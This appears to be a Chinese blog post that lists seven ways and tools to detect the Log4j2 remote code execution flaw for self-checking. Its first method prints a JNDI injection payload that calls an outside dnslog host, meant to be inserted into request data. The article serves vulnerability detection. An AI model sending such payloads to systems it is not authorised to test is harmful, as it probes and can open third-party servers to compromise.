距離Log4j2漏洞公開已經過去一個月了,它所造成的嚴重影響已經不需要我們重復提及了。隨着時間的推移,新的漏洞會不斷出現,舊的漏洞會不斷消失,而這個Log4j2中的RCE漏洞可能需要好幾年的時間才能得到解決。所以,在接下來的一段時間里,這個漏洞依然是我們需要去關注的重點。
本文收集和整理了幾種漏洞檢測方式和工具,以用於Log4j2漏洞檢測和自查。
1、dnslog手動驗證方法
首先在dnslog平台獲取一個子域名,嘗試構造payload,插入請求數據包。
${jndi:ldap://bypass.fzuqgl.ceye.io}
通過dnslog平台是否收到請求,初步判斷目標環境是否存在漏洞。
2、Log4j-scan
一款用於查找log4j2漏洞的python腳本,支持url檢測,支持HTTP請求頭和POST數據參數進行模糊測試。
github項目地址:
https://github.com/fullhunt/log4j-scan
3、Log4j2 burp被動掃描插件
通過插件的方式,將log4j2漏洞檢測能力集成到burp,從而提升安全測試人員的漏洞發現能力。
github項目地址:
https://github.com/f0ng/log4j2burpscanner https://github.com/Jeromeyoung/log4j2burpscanner
Log4j2 burp被動掃描插件效果:
4、AWVS掃描log4j2漏洞
AWVS14最新版本支持log4j2漏洞檢測,支持批量掃描,漏洞掃描神器是不會讓你失望的,准備更新武器庫吧。
5、制品級Log4j2漏洞檢測工具
本檢測工具基於騰訊安全的binAuditor,支持 Jar/Ear/War包上傳,一鍵上傳即可獲取到檢測結果。
檢測地址:
https://bsca.ms.qq.com/
Jar包檢測結果:
6、Log4j2 本地檢測工具
基於長亭牧雲產品提取出來的Log4j2本地檢測工具,可快速發現當前服務器存在風險的 log4j2 應用。
https://log4j2-detector.chaitin.cn/
7、360 漏洞檢測工具包
瀏覽器被動式掃描+本地檢測工具,提供了一個完整的Log4j2漏洞檢測方案,另外,工具包還包含了Log4j2補丁方案,如下圖:
